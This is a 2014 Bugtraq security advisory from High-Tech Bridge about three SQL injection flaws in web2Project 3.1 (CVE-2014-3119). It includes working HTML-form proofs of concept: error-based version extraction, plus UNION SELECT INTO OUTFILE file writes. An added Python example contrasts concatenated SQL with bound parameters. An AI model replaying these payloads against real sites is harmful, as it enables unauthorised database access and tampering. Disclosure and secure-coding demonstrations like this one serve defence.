Multiple SQL Injection Vulnerabilities in web2Project

Board: Bugtraq, posted 2014/06/18 21:01 (11 years ago)
Advisory ID: HTB23213
Product: web2Project
Vendor: http://web2project.net
Vulnerable Version(s): 3.1 and probably prior
Tested Version: 3.1
Advisory Publication: April 30, 2014 [without technical details]
Vendor Notification: April 30, 2014
Vendor Patch: May 1, 2014
Public Disclosure: June 18, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-3119
Risk Level: High
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in web2Project, which can be exploited to perform SQL Injection attacks and gain complete access to the vulnerable website.

1) SQL Injection in web2Project: CVE-2014-3119

1.1 The vulnerability exists due to insufficient sanitization of the "search_string" HTTP POST parameter passed to the "/index.php" script. A remote authenticated user with privileges to access the "contacts" module can inject and execute arbitrary SQL commands in the application's database and e.g. create, alter and delete information, or gain unauthorized access to the vulnerable website.

The following exploitation example displays the version of the MySQL server:

<form action="http://[host]/index.php?m=contacts" method="post" name="main">
<input type="hidden" name="search_string" value="'and(select 1 from(select count(*),concat((select version() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'">
<input type="submit" id="btn">
</form>

1.2 The vulnerability exists due to insufficient sanitization of the "updatekey" HTTP POST parameter passed to the "/do_updatecontact.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. A remote unauthenticated attacker can inject and execute arbitrary SQL commands in the application's database and e.g. create, alter and delete information, or gain unauthorized access to the vulnerable website.

The following exploitation example writes the word "immuniweb" into the file "file.txt", depending on MySQL configuration and filesystem permissions:

<form action="http://[host]/do_updatecontact.php" method="post" name="main">
<input type="hidden" name="updatekey" value="' UNION SELECT 'immuniweb' INTO OUTFILE 'file.txt' -- ">
<input type="submit" id="btn">
</form>

1.3 The vulnerability exists due to insufficient sanitization of the "updatekey" HTTP GET parameter passed to the "/updatecontact.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. A remote unauthenticated attacker can inject and execute arbitrary SQL commands in the application's database and e.g. create, alter and delete information, or gain unauthorized access to the vulnerable website.

The following exploitation example writes the word "immuniweb" into the file "file.txt", depending on MySQL configuration and filesystem permissions:

<form action="http://[host]/updatecontact.php" method="get" name="main">
<input type="hidden" name="updatekey" value="' UNION SELECT 'immuniweb' INTO OUTFILE 'file.txt' -- ">
<input type="submit" id="btn">
</form>

Successful exploitation of the vulnerabilities can grant an attacker unrestricted access to the website and its database.
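Added here to illustrate the root cause shared by items 1.1 to 1.3 (this is not web2Project's code or the vendor patch): an "updatekey" lookup built by string concatenation beside the same lookup with a bound parameter, plus an allow-list check on the key's format. The table and column names, the key format and the use of sqlite3 in place of MySQL are assumptions made so the example runs offline.

```python
import re
import sqlite3

# Constructed stand-in for the contacts table that updatecontact.php looks up
# by "updatekey". Table/column names are assumptions; sqlite3 replaces MySQL
# so the example runs offline.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE contacts (contact_id INTEGER, "
                 "contact_email TEXT, contact_updatekey TEXT)")
    conn.executemany("INSERT INTO contacts VALUES (?, ?, ?)", [
        (1, "alice@example.test", "k-alice-111"),
        (2, "bob@example.test", "k-bob-222"),
    ])
    return conn

def lookup_vulnerable(conn, updatekey):
    # The pattern behind CWE-89: the request parameter is spliced into the SQL
    # text, so a quote inside updatekey ends the literal and the rest of the
    # value is parsed as SQL.
    sql = ("SELECT contact_id, contact_email FROM contacts "
           "WHERE contact_updatekey = '" + updatekey + "'")
    return conn.execute(sql).fetchall()

def lookup_fixed(conn, updatekey):
    # Hardened form: the value is bound as a parameter and is never parsed as
    # SQL, whatever characters it contains.
    sql = ("SELECT contact_id, contact_email FROM contacts "
           "WHERE contact_updatekey = ?")
    return conn.execute(sql, (updatekey,)).fetchall()

# Assumed key format (defence in depth): reject anything that is not a short
# token of letters, digits and dashes before it reaches the database at all.
UPDATEKEY_RE = re.compile(r"^[A-Za-z0-9-]{1,64}$")

def is_valid_updatekey(updatekey):
    return UPDATEKEY_RE.fullmatch(updatekey) is not None

def demo():
    conn = make_db()
    # Constructed input in the shape of the advisory's payload: a closing
    # quote, a UNION, and a comment that swallows the trailing quote.
    hostile = "' UNION SELECT contact_id, contact_email FROM contacts -- "
    return {
        "legit_vuln": lookup_vulnerable(conn, "k-alice-111"),
        "legit_fixed": lookup_fixed(conn, "k-alice-111"),
        "hostile_vuln": lookup_vulnerable(conn, hostile),   # every contact leaks
        "hostile_fixed": lookup_fixed(conn, hostile),       # no row matches
        "hostile_valid": is_valid_updatekey(hostile),       # rejected up front
    }
```

With the concatenated query the hostile key returns every contact; with the bound parameter it matches nothing, and the format check rejects it before any query runs.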
-----------------------------------------------------------------------------------------------

Solution:

Apply vendor fixes:
https://github.com/web2project/web2project/commit/eead99b36f62a8222d9f3a913f1a2268200687ef
https://github.com/web2project/web2project/commit/ab5ba92a6aaf0435cd0b2132cf7f9b7b41575a28

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23213 - https://www.htbridge.com/advisory/HTB23213 - Multiple SQL Injection Vulnerabilities in web2Project.
[2] web2Project - http://web2project.net/ - web2Project is a Free Open Source business-oriented Project Management System (PMS) built for the future.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Article code (AID): #1JeOsEUq (Bugtraq)